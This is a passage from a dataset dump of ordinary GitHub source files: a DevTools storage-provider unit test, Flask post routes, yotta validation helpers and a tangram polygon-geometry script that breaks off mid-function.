cBase.protoMeta['fields'] = [] \n for fName in newFieldDict.keys() :\n cBase.protoMeta['fields'].append( newFieldDict[fName] )\n\n\n protoDef.metaDefinition = cBase.protoMeta \n protoDef.save() \n","repo_name":"DarioGT/django-softmach3","sub_path":"rai01ref/actions/buildFieldList.py","file_name":"buildFieldList.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25053012008","text":"import io\nimport sys\nfrom unittest import mock\nfrom unittest import TestCase\nimport zipfile\n\nfrom config import CHROME_UNSIGNED_ARTIFACT_PATH\nfrom config import CHROME_UNSIGNED_DT_FRONTEND_ZIP_BASE_DIRS\nfrom config import Project\nimport files\nfrom mocks.google_cloud_storage import MockedBlob\nfrom mocks.google_cloud_storage import MockedBucket\nimport pytest\n\nC = files.CONTINUE_SEARCH\nD = files.DOES_NOT_EXIST\n\nVERSION_1 = \"1.1.1.1\"\nVERSION_1_PATCH_0 = \"1.1.1.0\"\nVERSION_2 = \"2.1.9.1\"\nVERSION_100 = \"100.1.5678.1\"\nINVALID_VERSION = \"100.1.5678\"\n\nREVISION_1 = \"1b8b78f5838ed0b1c69bb4e51ea0252171854915\"\nREVISION_2 = \"ab8b78f5838ed0b1c69bb4e51ea0252171854915\"\nREVISION_6D = \"bbb878\"\nREVISION_100 = \"2b8b78f5838ed0b1c69bb4e51ea0252171854915\"\n\nVALID_FILE_A = \"valid-A\"\nVALID_FILE_B = \"valid-B\"\nVALID_FILE_C = \"valid-C\"\nINVALID_FILE_1 = \"invalid-1\"\nINVALID_FILE_2 = \"invalid-2\"\n\nPROJECT_FE = Project.DEVTOOLS_FRONTEND\nPROJECT_IN = Project.DEVTOOLS_INTERNAL\n\nDEMO_ZIP_NAME = \"2b8b78f5838ed0b1c69bb4e51ea025217185491a\"\nSAMPLE_CONTENT_1 = b\"sample-content-1\"\nSAMPLE_CONTENT_2 = b\"sample-content-2\"\n\n\ndef get_version_from_revision(revision):\n if revision == REVISION_1:\n return VERSION_1\n\n if revision == REVISION_2:\n return VERSION_2\n\n if revision == REVISION_100:\n return VERSION_100\n\n return None\n\n\ndef extract_from_zip_blob(blobnames, filename): # pylint: disable=W0613\n return SAMPLE_CONTENT_1\n\n\nclass LocalBucketProviderTest(TestCase):\n\n def get_provider(self, storage_suffix):\n provider = files.LocalBucketProvider(storage_suffix)\n provider.bucket = MockedBucket({\n f\"extracted/{REVISION_1}/{VALID_FILE_A}\":\n MockedBlob.from_content(SAMPLE_CONTENT_1),\n f\"extracted/{REVISION_1}-{PROJECT_IN.value}/{VALID_FILE_A}\":\n MockedBlob.from_content(SAMPLE_CONTENT_2),\n })\n return provider\n\n @mock.patch(\"files.storage\")\n def test_retrieve_project_file(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider(None)\n self.assertEqual(\n provider.retrieve((REVISION_1, VALID_FILE_A)), SAMPLE_CONTENT_1)\n\n provider = self.get_provider(PROJECT_IN.value)\n self.assertEqual(\n provider.retrieve((REVISION_1, VALID_FILE_A)), SAMPLE_CONTENT_2)\n\n @mock.patch(\"files.storage\")\n def test_retrieve_invalid_file(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider(PROJECT_FE)\n self.assertEqual(provider.retrieve((REVISION_1, INVALID_FILE_1)), C)\n\n @mock.patch(\"files.storage\")\n def test_process_response(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider(PROJECT_FE)\n\n # File is CACHED if returned by ANOTHER provider\n provider.process_response(None, (REVISION_1, VALID_FILE_B),\n SAMPLE_CONTENT_1)\n self.assertEqual(\n provider.retrieve((REVISION_1, VALID_FILE_B)), SAMPLE_CONTENT_1)\n\n # Response None is NOT CACHED\n provider.process_response(None, (REVISION_1, VALID_FILE_C), None)\n self.assertEqual(provider.retrieve((REVISION_1, VALID_FILE_C)), C)\n\n\nclass MockZipFileProvider(files.ZipFileProvider):\n TEST_ZIP_PATH = 'test-path/'\n\n def __init__(self):\n self.get_blobnames_calls = 0\n self.applies_to_version_calls = 0\n super().__init__()\n\n def get_bucketname(self):\n return 'mock-bucketname'\n\n def get_blobnames(self, revision, version): # pylint: disable=W0613\n self.get_blobnames_calls += 1\n if version == VERSION_1:\n return [version]\n return []\n\n def get_zip_base_dirs(self):\n return [self.TEST_ZIP_PATH]\n\n def applies_to_version(self, major_version):\n self.applies_to_version_calls += 1\n return major_version < 5\n\n\nclass ZipFileProviderTest(TestCase):\n\n FILE_VALID = f\"{MockZipFileProvider.TEST_ZIP_PATH}{VALID_FILE_A}\"\n FILE_INVALID = f\"{MockZipFileProvider.TEST_ZIP_PATH}{INVALID_FILE_1}\"\n\n def get_provider(self):\n provider = MockZipFileProvider()\n\n # Add mock bucket with temporary zip file\n buffer_1 = io.BytesIO()\n with zipfile.ZipFile(buffer_1, \"a\") as zip_file:\n filename = f\"{MockZipFileProvider.TEST_ZIP_PATH}{VALID_FILE_A}\"\n zip_file.writestr(filename, SAMPLE_CONTENT_1)\n\n buffer_2 = io.BytesIO()\n with zipfile.ZipFile(buffer_2, \"a\") as zip_file:\n filename = f\"{MockZipFileProvider.TEST_ZIP_PATH}{VALID_FILE_B}\"\n zip_file.writestr(filename, SAMPLE_CONTENT_1)\n\n provider.bucket = MockedBucket({\n VERSION_1: MockedBlob.from_content(buffer_1.getvalue()),\n VERSION_2: MockedBlob.from_content(buffer_2.getvalue()),\n })\n\n provider.local_bucket = MockedBucket()\n\n return provider\n\n @mock.patch(\"files.storage\")\n def test_is_any_file_in_zip(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n\n # Add mock zip table of content for local bucket\n zip_toc_path = provider.get_zip_toc_path(VERSION_1)\n provider.local_bucket = MockedBucket({\n zip_toc_path:\n MockedBlob.from_content(f\"{self.FILE_VALID}\\n\".encode(\"utf-8\")),\n })\n\n self.assertEqual(\n provider.is_any_file_in_zip(VERSION_1, [self.FILE_VALID]),\n (True, self.FILE_VALID))\n\n self.assertEqual(\n provider.is_any_file_in_zip(\n VERSION_1, [self.FILE_INVALID, self.FILE_VALID, self.FILE_INVALID]),\n (True, self.FILE_VALID))\n\n self.assertEqual(provider.is_any_file_in_zip(VERSION_1, []), (True, None))\n\n self.assertEqual(\n provider.is_any_file_in_zip(VERSION_1, [self.FILE_INVALID]),\n (True, None))\n\n self.assertFalse(\n provider.is_any_file_in_zip(VERSION_2, [self.FILE_VALID])[0])\n\n @mock.patch(\"files.storage\")\n def test_extract_from_zip_blob(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n\n # No ToC exists yet\n toc_path = provider.get_zip_toc_path(VERSION_1)\n self.assertNotIn(toc_path, provider.local_bucket.blobs)\n\n # Happy path without pre-check in ToC\n params = ([VERSION_1], VALID_FILE_A)\n self.assertEqual(provider.extract_from_zip_blob(*params), SAMPLE_CONTENT_1)\n\n # After requesting the blob once, the ToC exists\n self.assertIn(toc_path, provider.local_bucket.blobs)\n\n # …and contains the test file\n toc_blob = provider.local_bucket.blobs.get(toc_path)\n self.assertIn(\n self.FILE_VALID,\n toc_blob.download_as_bytes().decode(\"utf-8\").strip('\\n').split(\"\\n\"))\n\n download_count = toc_blob._download_as_bytes_count\n\n # Happy path with pre-check in ToC\n params = ([VERSION_1], VALID_FILE_A)\n self.assertEqual(provider.extract_from_zip_blob(*params), SAMPLE_CONTENT_1)\n self.assertEqual(toc_blob._download_as_bytes_count, download_count + 1)\n\n # Archive does not exist in bucket\n params = ([VERSION_100], VALID_FILE_A)\n self.assertEqual(provider.extract_from_zip_blob(*params), C)\n\n # Second archive exists in bucket\n params = ([VERSION_100, VERSION_1], VALID_FILE_A)\n self.assertEqual(provider.extract_from_zip_blob(*params), SAMPLE_CONTENT_1)\n\n # File does not exist in archive\n params = ([VERSION_1], INVALID_FILE_1)\n self.assertEqual(provider.extract_from_zip_blob(*params), D)\n\n # File exists in second archive only\n params = ([VERSION_2, VERSION_1], VALID_FILE_A)\n self.assertEqual(provider.extract_from_zip_blob(*params), D)\n\n # No blob provided\n params = ([], VALID_FILE_A)\n self.assertEqual(provider.extract_from_zip_blob(*params), C)\n\n @mock.patch(\"files.storage\")\n def test_extract_from_zip_blob_toc_creation(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n\n # Archive table of content does not exist\n zip_toc_path = provider.get_zip_toc_path(VERSION_1)\n blob = provider.local_bucket.blobs.get(zip_toc_path)\n self.assertIsNone(blob)\n\n provider.extract_from_zip_blob([VERSION_1], VALID_FILE_A)\n\n # Archive table of contents is created\n blob = provider.local_bucket.blobs.get(zip_toc_path)\n filename = f\"{MockZipFileProvider.TEST_ZIP_PATH}{VALID_FILE_A}\"\n expected = (filename + \"\\n\").encode(\"utf-8\")\n self.assertEqual(blob.download_as_bytes(), expected)\n\n @mock.patch(\"files.storage\")\n @mock.patch(\n \"files.get_version_from_revision\", side_effect=get_version_from_revision)\n def test_retrieve_happy_path(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n self.assertEqual(\n provider.retrieve((REVISION_1, VALID_FILE_A)), SAMPLE_CONTENT_1)\n\n @mock.patch(\"files.storage\")\n @mock.patch(\n \"files.get_version_from_revision\", side_effect=get_version_from_revision)\n def test_retrieve_invalid_revision(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n self.assertEqual(provider.retrieve(('invalid-revision', VALID_FILE_A)), C)\n\n @mock.patch(\"files.storage\")\n @mock.patch(\n \"files.get_version_from_revision\", side_effect=get_version_from_revision)\n def test_retrieve_inactive_major(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n self.assertEqual(provider.retrieve((REVISION_100, VALID_FILE_A)), C)\n self.assertEqual(provider.applies_to_version_calls, 1)\n\n @mock.patch(\"files.storage\")\n @mock.patch(\n \"files.get_version_from_revision\", side_effect=get_version_from_revision)\n def test_retrieve_invalid_blob(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n self.assertEqual(provider.retrieve((REVISION_2, VALID_FILE_A)), C)\n self.assertEqual(provider.get_blobnames_calls, 1)\n\n\nclass ChromeUnsignedProviderTest(TestCase):\n\n def test_get_blobnames(self):\n Provider = files.ChromeUnsignedProvider\n blobnames_0 = Provider.get_blobnames(None, None, \"9.0.12.0\") # type: ignore\n self.assertEqual(len(blobnames_0), 1)\n self.assertEqual(blobnames_0[0], CHROME_UNSIGNED_ARTIFACT_PATH % \"9.0.12.0\")\n\n blobnames_3 = Provider.get_blobnames(None, None, \"9.0.12.3\") # type: ignore\n self.assertEqual(len(blobnames_3), 4)\n self.assertEqual(blobnames_3[0], CHROME_UNSIGNED_ARTIFACT_PATH % \"9.0.12.3\")\n self.assertEqual(blobnames_3[1], CHROME_UNSIGNED_ARTIFACT_PATH % \"9.0.12.2\")\n self.assertEqual(blobnames_3[2], CHROME_UNSIGNED_ARTIFACT_PATH % \"9.0.12.1\")\n self.assertEqual(blobnames_3[3], CHROME_UNSIGNED_ARTIFACT_PATH % \"9.0.12.0\")\n\n @mock.patch(\"files.storage\")\n def test_get_zip_base_dirs(self, *mocks): # pylint: disable=W0613\n provider = files.ChromeUnsignedProvider(\n CHROME_UNSIGNED_DT_FRONTEND_ZIP_BASE_DIRS)\n\n self.assertEqual(provider.get_zip_base_dirs()[0],\n CHROME_UNSIGNED_DT_FRONTEND_ZIP_BASE_DIRS[0])\n\n\nclass LegacyM99ZipProviderTest(TestCase):\n\n @mock.patch(\"files.storage\")\n def test_get_blobnames(self, *mocks): # pylint: disable=W0613\n # Generate provider\n provider = files.LegacyM99ZipProvider()\n provider.bucket = MockedBucket({\n provider.LEGACY_M99_REVS_PATH % REVISION_1:\n MockedBlob.from_content(f\"{DEMO_ZIP_NAME} \\t\\n\".encode(\"utf-8\")),\n })\n\n # Happy path\n self.assertEqual(\n provider.get_blobnames(REVISION_1, VERSION_1)[0],\n provider.LEGACY_M99_ZIPS_PATH % DEMO_ZIP_NAME)\n\n # No meta content exists\n self.assertEqual(len(provider.get_blobnames(REVISION_100, VERSION_100)), 0)\n\n\nclass LegacyM99ShortRevisionProviderTest(TestCase):\n\n @mock.patch(\"files.storage\")\n @mock.patch(\n \"files.LegacyM99ShortRevisionProvider.extract_from_zip_blob\",\n side_effect=extract_from_zip_blob)\n def test_retrieve(self, *mocks): # pylint: disable=W0613\n # Generate provider\n provider = files.LegacyM99ShortRevisionProvider()\n provider.bucket = MockedBucket({\n provider.LEGACY_M99_REVS_PATH % REVISION_6D:\n MockedBlob.from_content(f\"{DEMO_ZIP_NAME} \\t\\n\".encode(\"utf-8\")),\n })\n\n # Happy path\n self.assertEqual(\n provider.retrieve((REVISION_6D, VALID_FILE_A)), SAMPLE_CONTENT_1)\n\n # Invalid revision\n self.assertEqual(provider.retrieve((REVISION_1, VALID_FILE_A)), C)\n\n\nclass LegacyM99StaticVersionProviderTest(TestCase):\n\n @mock.patch(\"files.storage\")\n @mock.patch(\n \"files.LegacyM99StaticVersionProvider.extract_from_zip_blob\",\n side_effect=extract_from_zip_blob)\n def test_retrieve(self, *mocks): # pylint: disable=W0613\n # Generate provider\n provider = files.LegacyM99StaticVersionProvider()\n provider.bucket = MockedBucket({\n provider.LEGACY_M99_VERS_PATH % VERSION_1_PATCH_0:\n MockedBlob.from_content(f\"{DEMO_ZIP_NAME} \\t\\n\".encode(\"utf-8\")),\n })\n\n # Happy path\n self.assertEqual(\n provider.retrieve((VERSION_1, VALID_FILE_A)), SAMPLE_CONTENT_1)\n\n # No zip vers file\n self.assertEqual(provider.retrieve((VERSION_2, VALID_FILE_A)), C)\n\n # Invalid version\n self.assertEqual(provider.retrieve((INVALID_VERSION, VALID_FILE_A)), C)\n\n\nclass LegacyM99FilesProviderTest(TestCase):\n VALID_SHA_HASH_A = \"220bcaa974b936128173b5ec89115d354223f8ab\"\n INVALID_SHA_HASH_1 = \"91abcaa974b936128173b5ec89115d354223f6cc\"\n\n def get_provider(self):\n provider = files.LegacyM99FilesProvider()\n\n meta_path = provider.LEGACY_M99_META_PATH % REVISION_1\n hashed_file_path = provider.LEGACY_M99_HASH_PATH % self.VALID_SHA_HASH_A\n\n provider.bucket = MockedBucket({\n meta_path:\n MockedBlob.from_content((\n f\"{self.VALID_SHA_HASH_A}:{VALID_FILE_A}\\n\"\n f\"{self.INVALID_SHA_HASH_1}:{INVALID_FILE_1}\\n\").encode(\"utf-8\")\n ),\n hashed_file_path:\n MockedBlob.from_content(SAMPLE_CONTENT_1),\n })\n\n return provider\n\n @mock.patch(\"files.storage\")\n def test_retrieve(self, *mocks): # pylint: disable=W0613\n provider = self.get_provider()\n self.assertEqual(\n provider.retrieve((REVISION_1, VALID_FILE_A)), SAMPLE_CONTENT_1)\n\n # No ToC meta file\n self.assertEqual(provider.retrieve((REVISION_2, VALID_FILE_A)), C)\n\n # No entry in ToC file\n self.assertEqual(provider.retrieve((REVISION_1, INVALID_FILE_2)), C)\n\n # Hash in ToC does not exist\n self.assertEqual(provider.retrieve((REVISION_1, INVALID_FILE_1)), C)\n\n\nclass GetPipelineTest(TestCase):\n\n @mock.patch(\"files.storage\")\n def test_get_revision_pipeline(self, *mocks): # pylint: disable=W0613\n self.assertGreater(\n len(files.get_revision_pipeline(PROJECT_FE).providers), 0)\n self.assertGreater(\n len(files.get_revision_pipeline(PROJECT_IN).providers), 0)\n\n @mock.patch(\"files.storage\")\n def test_get_version_pipeline(self, *mocks): # pylint: disable=W0613\n self.assertGreater(len(files.get_version_pipeline().providers), 0)\n\n\nif __name__ == \"__main__\":\n sys.exit(pytest.main([__file__]))\n","repo_name":"anuragsinghbam/devtools","sub_path":"files_test.py","file_name":"files_test.py","file_ext":"py","file_size_in_byte":14585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14722849704","text":"from flask import Blueprint, request\nfrom app.models import Post, db\nfrom flask_login import login_required, current_user\nfrom app.forms import PostForm\n\npost_routes = Blueprint(\"posts\", __name__)\n\n#ALL SPACES\n@post_routes.route('')\ndef get_all_posts():\n \"\"\"\n Query for all posts and returns a list of dictionaries\n \"\"\"\n all_posts = Post.query.all()\n response = [post.to_dict() for post in all_posts]\n return { 'posts': response }\n\n@post_routes.route('/', methods=[\"GET\"])\ndef get_one_post(id):\n \"\"\"\n Query for post by id\n \"\"\"\n post = Post.query.get(id)\n response = post.to_dict()\n return { 'post': response }\n\n@post_routes.route('/new', methods=[\"POST\"])\n@login_required\ndef create_one_post():\n \"\"\"\n create post\n \"\"\"\n form = PostForm()\n form['csrf_token'].data = request.cookies['csrf_token']\n if form.validate_on_submit():\n data = form.data\n print('DERTER IN CREATE POST/MUSIC', data)\n new_post = Post(\n title = data['title'],\n description = data['description'],\n user_id = data['user_id'],\n image_url = data['image_url'],\n # grab music url from the post, should be covered by notrequired in model\n music_url = data['music_url']\n )\n db.session.add(new_post)\n db.session.commit()\n return {\n \"post\": new_post.to_dict()\n }\n\n return {\n \"errors\": form.errors\n }\n\n@post_routes.route('/', methods=[\"DELETE\"])\n@login_required\ndef delete_one_post(id):\n \"\"\"\n Delete post\n \"\"\"\n post = Post.query.get(id)\n if current_user.id == post.user_id:\n db.session.delete(post)\n db.session.commit()\n return \"post Deleted\"\n else:\n return {\n \"errors\": \"You must be the owner of a post to delete that post.\"\n }\n\n@post_routes.route(\"/\", methods=[\"PUT\"])\n@login_required\ndef edit_one_post(id):\n \"\"\"\n Edit post\n \"\"\"\n print('no way')\n form = PostForm()\n form['csrf_token'].data = request.cookies['csrf_token']\n if form.validate_on_submit():\n data = form.data\n post = Post.query.get(id)\n\n if current_user.id == post.user_id:\n post.title = data['title']\n post.description = data['description']\n post.image_url = data['image_url']\n\n db.session.commit()\n return {\n \"post\": post.to_dict()\n }\n else:\n return {\"errors\": \"You must be the owner of a post to edit that post.\"}\n\n return {\n \"errors\": form.errors\n }\n","repo_name":"willmchristensen/Mu","sub_path":"app/api/posts_routes.py","file_name":"posts_routes.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23657248862","text":"import re\nimport os\nimport logging\n\n\n\nSource_Dir_Regex = re.compile('^[a-z0-9_-]*$')\nSource_Dir_Invalid_Regex = re.compile('[^a-z0-9_-]*')\nComponent_Name_Replace_With_Dash = re.compile('[^a-z0-9]+')\nLooks_Like_An_Email = re.compile('^[^@]+@[^@]+\\.[^@]+$')\n\nComponent_Name_Regex = r'^[a-z]+[a-z0-9-]*$'\nTarget_Name_Regex = r'^[a-z]+[a-z0-9+-]*$'\n\n# return True if the given directory name is a potential directory name\n# for tests, False otherwise\ndef isPotentialTestDir(dirname):\n return dirname.lower() in ('test', 'tests')\n\n# return an error string describing the validation failure, or None if there is\n# no error\ndef sourceDirValidationError(dirname, component_name):\n ''' validate source directory names in components '''\n if dirname == component_name:\n return 'Module %s public include directory %s should not contain source files' % (component_name, dirname)\n elif dirname.lower() in ('source', 'src') and dirname != 'source':\n return 'Module %s has non-standard source directory name: \"%s\" should be \"source\"' % (component_name, dirname)\n elif isPotentialTestDir(dirname) and dirname != 'test':\n return 'Module %s has non-standard test directory name: \"%s\" should be \"test\"' % (component_name, dirname)\n elif not Source_Dir_Regex.match(dirname):\n corrected = Source_Dir_Invalid_Regex.sub('', dirname.lower())\n if not corrected:\n corrected = 'source'\n return 'Module %s has non-standard source directory name: \"%s\" should be \"%s\"' % (component_name, dirname, corrected)\n else:\n return None\n\ndef componentNameValidationError(component_name):\n if not re.match(Component_Name_Regex, component_name):\n return 'Module name \"%s\" is invalid - must contain only lowercase a-z, 0-9 and hyphen, with no spaces.' % component_name\n return None\n\ndef targetNameValidationError(target_name):\n if not re.match(Target_Name_Regex, target_name):\n return 'Target name \"%s\" is invalid - must contain only lowercase a-z, 0-9, + and hyphen, with no spaces.' % target_name\n return None\n\ndef componentNameCoerced(component_name):\n return Component_Name_Replace_With_Dash.sub('-', component_name.lower())\n\ndef looksLikeAnEmail(email):\n if Looks_Like_An_Email.match(email):\n return True\n else:\n return False\n\ndef directoryModule(path):\n # Component, , represents an installed component, internal\n from yotta.lib import component\n # Pack, , base class for targets and components, internal\n from yotta.lib import pack\n try:\n c = component.Component(path)\n except pack.InvalidDescription as e:\n logging.error(e)\n return None\n return c\n\ndef directoryTarget(path):\n # Target, , represents an installed target, internal\n from yotta.lib import target\n # Pack, , base class for targets and components, internal\n from yotta.lib import pack\n try:\n t = target.Target(path)\n except pack.InvalidDescription as e:\n logging.error(e)\n return None\n return t\n\ndef currentDirectoryModule():\n c = directoryModule(os.getcwd())\n if not c:\n logging.error(str(c.error))\n logging.error('The current directory does not contain a valid module.')\n return None\n return c\n\ndef currentDirectoryTarget():\n t = directoryTarget(os.getcwd())\n if not t:\n logging.error(str(t.error))\n logging.error('The current directory does not contain a valid target.')\n return None\n return t\n\ndef currentDirectoryModuleOrTarget():\n # Component, , represents an installed component, internal\n from yotta.lib import component\n # Target, , represents an installed target, internal\n from yotta.lib import target\n # Pack, , base class for targets and components, internal\n from yotta.lib import pack\n wd = os.getcwd()\n errors = []\n p = None\n try:\n p = component.Component(wd)\n except pack.InvalidDescription as e:\n errors.append(e)\n if not p:\n try:\n p = target.Target(wd)\n except pack.InvalidDescription as e:\n errors.append(e)\n if not p:\n for e in errors:\n logging.debug(e)\n logging.error('The current directory does not contain a valid module or target.')\n return None\n return p\n","repo_name":"ARMmbed/yotta","sub_path":"yotta/lib/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"37"} +{"seq_id":"6864571467","text":"import re\nimport numpy as np\nfrom collections import namedtuple\nfrom matplotlib import path\nimport random\n\n\nclass Point():\n x = 0\n y = 0\n\n\nclass Piece():\n points = []\n color = ''\n\n\n# class Tangram:\npiecesList = [Piece]\nCoordinate = namedtuple('Coordinate', 'x y')\n# piecesDict = dict()\n\n\ndef getPieces(paths):\n piecesDict = dict()\n for path in paths:\n p = Piece()\n pointsList = []\n\n texts = re.findall(r'\"(.*?)\"', path)\n pathLine = texts[0]\n color = texts[1]\n\n a = re.sub('\\s+', ' ', pathLine).strip().split(' ')\n length = len(a)\n\n for i in range(1, length, 3):\n pointsList.append((int(a[i]), int(a[i+1])))\n\n p.color = color\n p.points = pointsList\n piecesList.append(p)\n piecesDict[color] = pointsList\n\n return piecesDict\n\n\ndef readFile(f):\n # with open(filename,'r') as f:\n s = f.readlines()\n paths = []\n\n for line in s:\n line = line.strip()\n if line.startswith('= 3:\n for i in range(0, actualLength-2):\n ptA = pointsList[i]\n ptB = pointsList[i+1]\n for j in range(i+2, actualLength + i - 2):\n j = j % actualLength\n ptC = pointsList[j]\n ptD = pointsList[(j+1) % actualLength]\n\n det0, det1 = 0, 0\n det0 = checkOrientationFor2Points(ptA, ptB, ptC)\n det1 = checkOrientationFor2Points(ptA, ptB, ptD)\n\n if det0 != det1:\n det0 = checkOrientationFor2Points(ptC, ptD, ptA)\n det1 = checkOrientationFor2Points(ptC, ptD, ptB)\n\n if det0 != det1:\n return False\n\n else:\n continue\n return True\n\n\ndef checkOrientationFor2Points(ptA, ptB, ptC):\n xa, ya = ptA[0], ptA[1]\n xb, yb = ptB[0], ptB[1]\n xc, yc = ptC[0], ptC[1]\n\n det = (xb*yc) + (xa*yb) + (ya*xc) - (ya*xb) - (yb*xc) - (xa*yc)\n\n if det > 0:\n return 1\n elif det < 0:\n return -1\n else:\n return 0\n\n\ndef getAreaOfColoredPieces(pointsList):\n area = 0.0\n noOfPoints = len(pointsList)\n\n j = noOfPoints - 1\n for i in range(0, noOfPoints):\n pointTupleJ = pointsList[j]\n pointTupleI = pointsList[i]\n area += (pointTupleJ[0] + pointTupleI[0]) * \\\n (pointTupleJ[1] - pointTupleI[1])\n j = i\n\n return abs(area/2.0)\n\n\ndef are_identical_sets_of_coloured_pieces(coloured_pieces_1, coloured_pieces_2):\n area1, area2 = 0.0, 0.0\n\n for a in coloured_pieces_1.values():\n area1 += getAreaOfColoredPieces(a)\n\n for a in coloured_pieces_1.values():\n area2 += getAreaOfColoredPieces(a)\n\n if area1 != area2:\n return False\n\n return check(coloured_pieces_1, coloured_pieces_2)\n\n\ndef reflectionXaxis(pointsList):\n reflectedPoints = set()\n c = 0\n m = 1\n\n for pt in pointsList:\n x1, y1 = pt[0], pt[1]\n d = (x1 + (y1 - c)*m)/(1 + m**2)\n x2 = 2*d - x1\n y2 = 2*d*m - y1 + 2*c\n reflectedPoints.add((int(x2), int(y2)))\n\n return reflectedPoints\n\n\ndef reflectionYaxis(pointsList):\n reflectedPoints = set()\n # x = 0\n c = 0\n m = 0\n\n for pt in pointsList:\n x1, y1 = pt[0], pt[1]\n d = (x1 + (y1 - c)*m)/(1 + m**2)\n x2 = 2*d - x1\n y2 = 2*d*m - y1 + 2*c\n reflectedPoints.add((int(x2), int(y2)))\n\n return reflectedPoints\n\n\ndef getNormalisedPointsSet(pointsSet):\n normalisedPoints = set()\n pt = pointsSet.pop()\n minX, minY = pt[0], pt[1]\n pointsSet.add(pt)\n\n for point in pointsSet:\n if point[0] < minX:\n minX = point[0]\n if point[1] < minY:\n minY = point[1]\n # minY = point[1] if point[1] < minY\n\n for point in pointsSet:\n ptTuple = (int(point[0] - minX), int(point[1] - minY))\n normalisedPoints.add(ptTuple)\n\n return normalisedPoints\n\n\ndef check(coloured_pieces_1, coloured_pieces_2):\n for key in coloured_pieces_1:\n pointsList = coloured_pieces_1[key]\n\n pointsSet = set(pointsList)\n\n if key not in coloured_pieces_2:\n return False\n\n targetPoints = set(coloured_pieces_2[key])\n targetPoints = getNormalisedPointsSet(targetPoints)\n\n # Q4\n if pointsSet == targetPoints:\n continue\n\n normalisedPoints = getNormalisedPointsSet(pointsSet)\n if normalisedPoints == targetPoints:\n continue\n\n # Q1\n reflectedPoints = set()\n reflectedPoints = reflectionXaxis(normalisedPoints)\n normalisedPoints = getNormalisedPointsSet(reflectedPoints)\n\n if normalisedPoints == targetPoints:\n continue\n\n # Q3\n reflectedPoints.clear()\n normalisedPoints.clear()\n\n reflectedPoints = reflectionYaxis(pointsList)\n normalisedPoints = getNormalisedPointsSet(reflectedPoints)\n\n if normalisedPoints == targetPoints:\n continue\n\n # Q2\n reflectedPoints.clear()\n reflectedPoints = reflectionXaxis(normalisedPoints)\n normalisedPoints = getNormalisedPointsSet(reflectedPoints)\n\n if normalisedPoints == targetPoints:\n continue\n\n # mirroring\n # Q4\n mirroredPts = set()\n for point in pointsSet:\n ptTuple = (point[1], point[0])\n mirroredPts.add(ptTuple)\n\n if mirroredPts == targetPoints:\n continue\n\n # Q1\n reflectedPoints = reflectionXaxis(mirroredPts)\n normalisedPoints = getNormalisedPointsSet(reflectedPoints)\n\n if normalisedPoints == targetPoints:\n continue\n\n # Q3\n reflectedPoints = reflectionYaxis(mirroredPts)\n normalisedPoints = getNormalisedPointsSet(reflectedPoints)\n\n if normalisedPoints == targetPoints:\n continue\n\n # Q2\n reflectedPoints = reflectionXaxis(reflectedPoints)\n normalisedPoints = getNormalisedPointsSet(reflectedPoints)\n\n if normalisedPoints != targetPoints:\n return False\n\n return True\n\n\ndef is_solution(tangram, shape):\n\n # if not are_valid(tangram):\n # return False\n\n # check area\n areaTangram, areaShape = 0.0, 0.0\n\n for key in tangram:\n areaTangram += getAreaOfColoredPieces(tangram[key])\n\n for key in shape:\n areaShape += getAreaOfColoredPieces(shape[key])\n\n if areaTangram != areaShape:\n return False\n\n pieces, target = dict(), dict()\n if len(tangram.keys()) > 1:\n pieces, target = tangram, shape\n else:\n pieces, target = shape, tangram\n\n # check if point inside polygon\n allTargetValues = target.values()\n targetPoints = list()\n\n for value in allTargetValues:\n targetPoints = value\n\n increasedPoints1 = increaseSizeOfPolygon(targetPoints, 0.1, 0.0)\n increasedPoints2 = increaseSizeOfPolygon(targetPoints, 0.0, 0.1)\n increasedPoints3 = increaseSizeOfPolygon(targetPoints, 0.0, -0.1)\n increasedPoints4 = increaseSizeOfPolygon(targetPoints, -0.1, 0.0)\n polyPath = path.Path(increasedPoints1)\n\n for key in pieces:\n ptsList = pieces[key]\n\n inOutArray = polyPath.contains_points(ptsList)\n\n polyPath = path.Path(increasedPoints2)\n inOutArray2 = polyPath.contains_points(ptsList)\n \n\n polyPath = path.Path(increasedPoints3)\n inOutArray3 = polyPath.contains_points(ptsList)\n\n \n polyPath = path.Path(increasedPoints4)\n inOutArray4 = polyPath.contains_points(ptsList)\n\n a1 = np.array(inOutArray)\n a2 = np.array(inOutArray2)\n a3 = np.array(inOutArray3)\n a4 = np.array(inOutArray4)\n\n z = a1 | a2 | a3 | a4\n\n if not z.all:\n return False\n\n if doPiecesIntersectTarget(pieces, targetPoints):\n return False\n\n return True\n\n\ndef onSegment(ptA, ptB, ptC):\n\n if (ptB[0] <= max(ptA[0], ptC[0]) and ptB[0] >= min(ptA[0], ptC[0]) and\n ptB[1] <= max(ptA[1], ptC[1]) and ptB[1] >= min(ptA[1], ptC[1])):\n return True\n\n return False\n\n\ndef orientation(ptA, ptB, ptC):\n val = (ptB[1] - ptA[1]) * (ptC[0] - ptB[0]) - (ptB[0] - ptA[0]) * (ptC[1] - ptB[1])\n\n if (val == 0):\n return 0 # colinear\n\n if val > 0:\n return 1\n else:\n return 2\n\n\ndef doIntersect(ptA, ptB, ptC, ptD):\n o1 = orientation(ptA, ptB, ptC)\n o2 = orientation(ptA, ptB, ptD)\n o3 = orientation(ptC, ptD, ptA)\n o4 = orientation(ptC, ptD, ptB)\n\n if ((o1 != o2) and (o3 != o4)):\n return True\n\n # Special Cases\n # ptA, ptB and ptC are colinear and ptC lies on segment ptAptB\n if (o1 == 0 and onSegment(ptA, ptC, 